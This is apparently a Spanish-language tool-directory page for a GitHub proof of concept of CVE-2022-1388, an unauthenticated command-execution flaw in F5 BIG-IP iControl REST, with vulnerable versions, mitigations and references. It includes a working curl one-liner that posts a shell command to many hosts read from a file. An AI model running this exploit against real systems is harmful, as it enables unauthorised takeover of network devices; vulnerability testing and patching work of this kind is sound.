Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-1388 — PoC de la vulnerabilidad CVE-2022-1388 en iControl REST de BIG-IP | Kitploit
Herramientas/GitHubGitHub/shamo0/cve-2022-1388
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubshamo0/cve-2022-1388

CVE-2022-1388

PoC de la vulnerabilidad CVE-2022-1388 en iControl REST de BIG-IP

Ver Repositorio
147hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de iControl REST en BIG-IP CVE-2022-1388 PoC

f5logo

Esta vulnerabilidad puede permitir que un atacante no autenticado con acceso de red al sistema BIG-IP a través del puerto de administración y/o las direcciones IP self ejecute comandos arbitrarios del sistema, cree o elimine archivos, o deshabilite servicios.

PoC

Puede usar el siguiente one-liner de curl para comprobar la vulnerabilidad de F5 Big-IP o usar el script de Python proporcionado.

root@kitploit:~
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

Versiones vulnerables (Big-IP)

Descargar herramienta
RamaVersiones vulnerablesCorrecciones introducidas
11.x11.6.1-11.6.5Sin corrección
12.x12.1.0-12.1.6Sin corrección
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xNinguna17.0.0

Mitigación

  • Actualice a la versión corregida en la columna ```Fixes Introduced```. (Método preferido)
  • Bloquee el acceso a iControl REST a través de la dirección IP self
  • Bloquee el acceso a iControl REST a través de la interfaz de administración
  • Modifique la configuración de httpd de BIG-IP

Para obtener más información sobre la mitigación, consulte las referencias.

Referencias

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit